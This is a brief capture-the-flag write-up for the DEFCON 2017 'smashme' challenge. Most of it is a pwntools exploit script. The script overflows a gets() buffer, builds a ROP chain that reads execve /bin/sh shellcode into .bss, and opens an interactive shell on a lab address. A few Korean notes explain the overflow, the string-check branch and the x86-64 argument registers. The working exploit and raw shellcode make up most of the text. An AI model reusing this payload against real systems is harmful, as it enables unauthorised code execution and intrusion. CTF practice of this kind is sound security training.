DEFCON 2017 smashme

p=remote("192.168.146.133",9001)
elf=ELF("./smashme")
 
read_plt=elf.symbols["read"]
bss=elf.bss()+0x20
 
shellcode="\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
 
shell_rsi=0x004015f7
shell_rdi=0x004014d6
shell_rdx=0x00441e46
 
filt="Smash me outside, how bout dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
 
payload=filt
payload+=p64(shell_rsi)
payload+=p64(bss)
payload+=p64(shell_rdi)
payload+=p64(0)
payload+=p64(shell_rdx)
payload+=p64(len(shellcode))
payload+=p64(read_plt)
payload+=p64(bss)
 
 
p.sendline(payload)
p.sendline(shellcode)
p.interactive()
 
 

아이다로 보면 GETS함수로 버퍼오버플로우 취약점이 있음

분기문 하나가 보일텐데 저 문자열(filt 변수 문자열)이 아니라면 QUIT 시키고 맞다면 정상적으로 leave; ret이 됨

쉘코드가 64bit syscall하는 쉘코드 (출처 : http://shell-storm.org/shellcode/files/shellcode-806.php)

rdi 1

rsi 2

rdx 3 

rcx  4

64bit 인자 레지스터